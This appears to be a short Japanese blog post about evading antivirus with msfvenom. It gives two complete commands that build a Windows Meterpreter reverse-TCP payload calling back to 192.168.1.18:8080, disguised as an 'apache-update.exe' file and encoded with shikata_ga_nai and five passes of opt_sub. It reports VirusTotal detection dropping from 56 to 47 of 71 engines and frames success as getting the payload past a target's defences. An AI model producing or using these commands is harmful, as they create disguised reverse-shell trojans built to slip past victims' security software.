shikata ga nai

Private? There is no such things.

msfvenomでアンチウィルスソフトを回避してみた

Hello there, ('ω')ノ

 

Metasploitを使用したクライアント側の攻撃で、

msfvenomで、ペイロードをつくることはできるものの。

使用したところで、アンチウイルスソフトで検出される可能性も高くて。

アンチウイルスの検出を回避するためには、エンコーダを使用する必要があって。

たとえば、shikata_ga_naiだったり。

下記のようにmsfvenomで、Remove .exe形式の単純なペイロードを生成して。

 

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=8080 -e x86/shikata_ga_nai -f exe -o /root/apache-update.exe

 

f:id:ThisIsOne:20200602083636p:plain

 

つくったペイロードは、下記のサイトへアップして検証できて。

アップロードするとアンチウイルスソフトがスキャンしてくれて。

 https://www.virustotal.com/gui/home/upload

 

f:id:ThisIsOne:20200602084147p:plain

 

結果、71のアンチウイルスソフトのうち56によって検出されたことがわかって。

この検出率だとターゲットに送信しても成功する可能性は低くて。

 

f:id:ThisIsOne:20200602084323p:plain

 

f:id:ThisIsOne:20200602084416p:plain

 

msfvenomには、エンコードプロセスを複数回繰り返すオプションもあって。

エンコーダを複数回渡すと、エンコーダがステルス的になる可能性があって。

msfvenomのoptionは以下のとおりで。

 

f:id:ThisIsOne:20200602100903p:plain


今回は、下記のようにエンコーダを5回実行してステルスを向上させることに。

 

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.18 LPORT=8080 -e x86/opt_sub -i 5 -b '\x00' -f exe -o /root/apache-update2.exe

 

f:id:ThisIsOne:20200602085233p:plain

 

再度、ペイロードファイルをアップロードして。

すると、71のうち47のウイルス対策プログラムのみがペイロードを検出できて。

少しだけ成功への改善となったようで。

 

おそらく、ペイロードを完全に検出できなくする可能性はなくて。

ペイロードを検出不可能にするためには。

多くのエンコーダの順列や組み合わせ、反復といった試行錯誤が必要で。

ただ、エンコーダを複数反復実行すると、元のペイロードコードが損傷することも。

 

f:id:ThisIsOne:20200602085040p:plain

 

Best regards, (^^ゞ

コロナを甘く見るな!ひとりひとりの自覚をもった行動で医療従事者を助けよう。

f:id:ThisIsOne:20200404115457p:plain